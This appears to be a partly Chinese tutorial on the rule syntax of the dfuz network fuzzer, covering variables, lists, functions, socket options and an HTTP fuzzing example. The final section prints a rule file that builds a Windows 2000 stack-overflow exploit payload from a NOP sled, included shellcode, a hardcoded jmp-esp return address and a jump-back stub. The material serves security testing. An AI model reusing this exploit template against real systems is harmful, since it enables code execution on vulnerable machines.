var myVar = "Something"
var myVar2 = "String",0x41,|0xdeadbeef|,|0xdeadbeefx5|,|"\x41\x41\x41\x41"x2|,[Bx50],[\x45x6],["Hello"x4],1024,{b040d0b4-b040d0b8- x 1}
var myVar3 = $myVar2
--------------
list:
list some_list:
begin
some_data
some_data
some_data
end
--------------
函数
- %dec2str(num) : Will convert (num) to string and put it. //函数说明
Example: %dec2str(1024) //调用
Result: "1024"
---------------
Options
指定这个配置文件的选项
支持选项有:
- interact: will do select() between the client and server after processing every "peer" command.
- keep_connecting: this will continue the process even if we cannot connect (in a few words: DON'T EXIT).
- big_endian: will make {} formats big endian (little_endian by default)
- little_endian: will make {} formats little endian (default)
- tcp: will make a stream socket
- udp: will make a datagram socket
- client_side: Will connect to a server. (Default)
- server_side: Will be a server waiting for a connection.
- use_stdout: This option will make the socket to be stdout instead of a peer, to use this you need to use "stdout" as the host also.
---------
我们利用以上语法来看一个http协议rules的例子:
例如:
port = 80/tcp
list some_list:
begin
GET
HEAD
End
var get_file = "/index.html"
var content_length = %dec2str(0xffffffff)
root@sec-portal:/usr/local/condor/fuzz/dfuz_0.3.0-beta/rules# cat win32-xpl.rule
# Some rule to exploit a win32 stack overrun example.
# Diego Bauche
<inc "./vars/shellcodes.vars">
var shellcode = $win32_alnum_scode
var nops_len = %length(1032-$shellcode)
var nops_first = [\x90x$nops_len]
var nops_last = [\x90x36]
# jmp esp - windows 2000 sp0
var eip = |77e822ea|
# Nasty, sub sp, 400 - jmp esp
var jump_back = 0x66,0x81,0xec,0x02,0x04,0x8b,0xec,0xff,0xe4
var payload = $nops_first,$shellcode,%random:dword(),$eip,$nops_last,$jump_back
